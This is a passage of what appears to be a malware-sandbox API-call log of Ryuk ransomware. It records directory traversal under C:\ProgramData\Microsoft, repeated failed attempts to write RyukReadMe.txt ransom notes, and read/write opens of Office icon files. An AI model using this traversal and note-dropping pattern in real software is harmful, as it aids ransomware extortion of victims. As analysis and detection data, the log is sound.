lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0140.668] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.669] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Microsoft\\Network\\Connections\\*.*", lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0x3a2e20 [0140.669] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0140.669] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0 [0140.669] FindClose (in: hFindFile=0x3a2e20 | out: hFindFile=0x3a2e20) returned 1 [0140.669] SetLastError (dwErrCode=0x0) [0140.669] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Network\\Connections\\RyukReadMe.txt" (normalized: "c:\\programdata\\microsoft\\network\\connections\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.669] GetLastError () returned 0x5 [0140.669] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0140.669] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.669] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0140.669] SetLastError (dwErrCode=0x0) [0140.669] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Network\\RyukReadMe.txt" (normalized: "c:\\programdata\\microsoft\\network\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.669] GetLastError () returned 0x5 [0140.669] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0140.669] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.669] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Microsoft\\Network\\Downloader\\*.*", lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0xffffffffffffffff [0140.669] FindClose (in: hFindFile=0xffffffffffffffff | out: hFindFile=0xffffffffffffffff) returned 0 [0140.669] SetLastError (dwErrCode=0x0) [0140.669] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Network\\Downloader\\RyukReadMe.txt" (normalized: "c:\\programdata\\microsoft\\network\\downloader\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.670] GetLastError () returned 0x5 [0140.670] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0140.670] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.670] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 0 [0140.670] FindClose (in: hFindFile=0x3a2dc0 | out: hFindFile=0x3a2dc0) returned 1 [0140.670] SetLastError (dwErrCode=0x0) [0140.670] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Network\\RyukReadMe.txt" (normalized: "c:\\programdata\\microsoft\\network\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.670] GetLastError () returned 0x5 [0140.670] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0) returned 0 [0140.670] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.670] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0140.670] SetLastError (dwErrCode=0x0) [0140.670] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\RyukReadMe.txt" (normalized: "c:\\programdata\\microsoft\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.670] GetLastError () returned 0x5 [0140.670] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0) returned 0 [0140.670] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.670] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Microsoft\\OFFICE\\*.*", lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 0x3a2dc0 [0140.671] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0140.671] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0140.672] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0140.672] SetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft\\OFFICE\\AssetLibrary.ico", dwFileAttributes=0x80) returned 0 [0140.672] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\OFFICE\\AssetLibrary.ico" (normalized: "c:\\programdata\\microsoft\\office\\assetlibrary.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.672] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.672] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0140.672] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0140.672] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0140.672] SetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft\\OFFICE\\DocumentRepository.ico", dwFileAttributes=0x80) returned 0 [0140.672] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\OFFICE\\DocumentRepository.ico" (normalized: "c:\\programdata\\microsoft\\office\\documentrepository.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.673] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.673] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0140.673] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0140.673] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0140.673] SetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft\\OFFICE\\MySharePoints.ico", dwFileAttributes=0x80) returned 0 [0140.673] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\OFFICE\\MySharePoints.ico" (normalized: "c:\\programdata\\microsoft\\office\\mysharepoints.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.673] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.673] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0140.673] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0140.673] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0140.673] SetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft\\OFFICE\\MySite.ico", dwFileAttributes=0x80) returned 0 [0140.674] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\OFFICE\\MySite.ico" (normalized: "c:\\programdata\\microsoft\\office\\mysite.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.674] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.674] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0140.674] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0140.674] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0140.674] SetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft\\OFFICE\\SharePointPortalSite.ico", dwFileAttributes=0x80) returned 0 [0140.674] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\OFFICE\\SharePointPortalSite.ico" (normalized: "c:\\programdata\\microsoft\\office\\sharepointportalsite.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.674] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.674] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0140.674] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0140.674] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0140.675] SetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft\\OFFICE\\SharePointTeamSite.ico", dwFileAttributes=0x80) returned 0 [0140.675] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\OFFICE\\SharePointTeamSite.ico" (normalized: "c:\\programdata\\microsoft\\office\\sharepointteamsite.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.675] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.675] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0140.675] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0140.675] SetLastError (dwErrCode=0x0) [0140.675] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\OFFICE\\RyukReadMe.txt" (normalized: "c:\\programdata\\microsoft\\office\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.676] GetLastError () returned 0x5 [0140.676] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0140.676] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.676] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\*.*", lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0x3a2e20 [0140.676] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0140.676] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0140.676] SetLastError (dwErrCode=0x0) [0140.676] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\RyukReadMe.txt" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.676] GetLastError () returned 0x5 [0140.676] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0140.676] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.677] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3a2e80 [0140.678] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0140.679] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0140.679] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0140.679] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0140.679] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0140.679] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0140.679] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0140.679] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0140.679] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0140.679] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0140.679] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0140.679] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0140.679] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0140.679] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0140.679] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0140.679] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0140.679] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0140.679] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0140.679] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0140.679] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0140.679] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0140.679] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0140.679] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0140.679] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0140.679] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0140.679] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0140.679] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0140.679] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0140.679] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0140.679] FindClose (in: hFindFile=0x3a2e80 | out: hFindFile=0x3a2e80) returned 1 [0140.680] SetLastError (dwErrCode=0x0) [0140.680] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\RyukReadMe.txt" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.683] GetLastError () returned 0x5 [0140.683] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0140.683] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.683] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0140.683] SetLastError (dwErrCode=0x0) [0140.683] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\RyukReadMe.txt" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.683] GetLastError () returned 0x5 [0140.683] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0140.683] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.683] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3a2e80 [0140.684] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0140.685] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0140.685] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0140.685] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0140.685] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0140.685] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0140.685] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0140.685] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0140.685] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0140.685] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0140.685] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0140.685] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0140.685] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0140.685] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0140.685] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0140.685] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0140.685] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0140.685] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0140.685] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0140.685] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0140.685] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0140.685] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0140.685] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0140.685] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0140.685] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0140.685] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0140.685] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0140.685] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0140.685] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0140.686] FindClose (in: hFindFile=0x3a2e80 | out: hFindFile=0x3a2e80) returned 1 [0140.686] SetLastError (dwErrCode=0x0) [0140.686] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\RyukReadMe.txt" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.689] GetLastError () returned 0x5 [0140.689] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0140.689] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.689] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0 [0140.689] FindClose (in: hFindFile=0x3a2e20 | out: hFindFile=0x3a2e20) returned 1 [0140.689] SetLastError (dwErrCode=0x0) [0140.689] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\RyukReadMe.txt" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.689] GetLastError () returned 0x5 [0140.689] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0140.689] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.689] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 0 [0140.689] FindClose (in: hFindFile=0x3a2dc0 | out: hFindFile=0x3a2dc0) returned 1 [0140.689] SetLastError (dwErrCode=0x0) [0140.689] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\OFFICE\\RyukReadMe.txt" (normalized: "c:\\programdata\\microsoft\\office\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.689] GetLastError () returned 0x5 [0140.689] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0) returned 0 [0140.689] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.689] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0140.689] SetLastError (dwErrCode=0x0) [0140.689] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\RyukReadMe.txt" (normalized: "c:\\programdata\\microsoft\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.690] GetLastError () returned 0x5 [0140.690] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0) returned 0 [0140.690] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.690] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\*.*", lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 0x3a2dc0 [0140.690] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0140.690] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0140.690] SetLastError (dwErrCode=0x0) [0140.690] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\RyukReadMe.txt" (normalized: "c:\\programdata\\microsoft\\officesoftwareprotectionplatform\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.690] GetLastError () returned 0x5 [0140.690] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 